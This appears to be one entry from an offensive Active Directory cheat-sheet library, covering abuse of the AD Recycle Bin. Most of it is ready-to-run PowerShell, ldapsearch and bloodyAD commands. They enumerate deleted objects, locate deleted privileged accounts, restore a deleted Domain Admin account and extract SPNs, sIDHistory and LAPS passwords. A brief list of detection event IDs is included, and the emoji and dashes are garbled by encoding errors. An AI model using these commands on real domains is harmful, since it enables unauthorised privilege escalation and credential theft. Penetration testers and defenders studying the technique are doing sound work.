attack-78-ad-recycle-bin-object-abuse.md (4623B)
1 --- 2 title: "Attack #78 โ AD Recycle Bin Object Abuse" 3 description: "When the AD Recycle Bin feature is enabled (Server 2008 R2+), deleted AD objects are moved to the CN=Deleted Objects container and retained for aโฆ" 4 category: active-directory 5 subcategory: "Advanced & Post-Exploitation" 6 tags: ["active-directory", "privilege-escalation"] 7 tools: ["NetExec", "ldapsearch", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/๐ท Attack #78 โ AD Recycle Bin Object Abuse.md" 11 --- 12 # ๐ท Attack #78 โ AD Recycle Bin Object Abuse 13 14 *** 15 16 ## ๐ How It Works 17 18 When the **AD Recycle Bin** feature is enabled (Server 2008 R2+), deleted AD objects are moved to the `CN=Deleted Objects` container and retained for a configurable period (default 180 days). These deleted objects **retain all their attributes** โ including passwords, SPNs, group memberships, and ACLs. An attacker can query the Recycle Bin to find recently deleted privileged accounts and either restore them or extract their sensitive attributes for exploitation. 19 20 *** 21 22 ## โ๏ธ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **AD Recycle Bin enabled** | Domain/Forest functional level 2008 R2+ | 27 | **Domain user** | Basic read access to Deleted Objects container | 28 | **Or DA** | For object restoration | 29 30 *** 31 32 ## ๐ป Full Commands 33 34 ```powershell 35 # โโ Check if Recycle Bin is enabled โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 36 Get-ADOptionalFeature -Filter {Name -like "Recycle*"} 37 38 # โโ Query deleted objects โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 39 Get-ADObject -SearchBase "CN=Deleted Objects,DC=corp,DC=local" \ 40 -IncludeDeletedObjects -Filter * -Properties * 41 42 # โโ Find deleted privileged users โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 43 Get-ADObject -SearchBase "CN=Deleted Objects,DC=corp,DC=local" \ 44 -IncludeDeletedObjects -Filter {ObjectClass -eq "user" -and adminCount -eq 1} \ 45 -Properties sAMAccountName,memberOf,adminCount,whenChanged 46 47 # โโ Restore a deleted DA account โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 48 Restore-ADObject -Identity "<deleted_object_DN>" -NewName "restored_admin" 49 50 # โโ Extract attributes from deleted objects โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 51 Get-ADObject -SearchBase "CN=Deleted Objects,DC=corp,DC=local" \ 52 -IncludeDeletedObjects -Filter {sAMAccountName -eq "old_svc_account"} \ 53 -Properties servicePrincipalName,sIDHistory,ms-Mcs-AdmPwd 54 ``` 55 56 ```bash 57 # โโ ldapsearch โ query Deleted Objects โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 58 ldapsearch -x -H ldap://DC01.corp.local -D "low_user@corp.local" -w 'Password1' \ 59 -b "CN=Deleted Objects,DC=corp,DC=local" \ 60 -s sub "(objectClass=user)" -E '!1.2.840.113556.1.4.417=::MAA=' 61 62 # โโ NetExec / bloodyAD โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 63 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 64 get children "CN=Deleted Objects,DC=corp,DC=local" --type user 65 ``` 66 67 *** 68 69 ## ๐ก๏ธ Detection โ Event IDs 70 71 | Event ID | Source | What to Look For | 72 |---|---|---| 73 | **4662** | Security Log (DC) | Access to Deleted Objects container | 74 | **4741** | Security Log (DC) | Restored computer account | 75 | **4720** | Security Log (DC) | Restored user account | 76 77 *** 78 79 ## ๐ Attack Chain Context 80 81 ``` 82 [AD Recycle Bin] โโโ Recover deleted privileged objects / extract sensitive attributes 83 โ 84 โโโโ ๐๏ธ Deleted objects retain: passwords, SPNs, group memberships, LAPS 85 โโโโ ๐ Restore deleted DA account โ instant privilege escalation 86 โโโโ ๐ Default retention: 180 days 87 โโโโ ๐ Defeated by: monitor Deleted Objects access, purge sensitive objects properly 88 ``` 89 90 *** 91 92 > โ **Attack #78 โ AD Recycle Bin Object Abuse complete.** 93 94 *** 95 96 > ๐ **Category 10 โ Misc / Modern Attacks is now COMPLETE (7/7 attacks).** 97 98 *** 99 100 > ๐ **THE FULL 78-ATTACK AD CHEAT SHEET LIBRARY IS NOW COMPLETE.**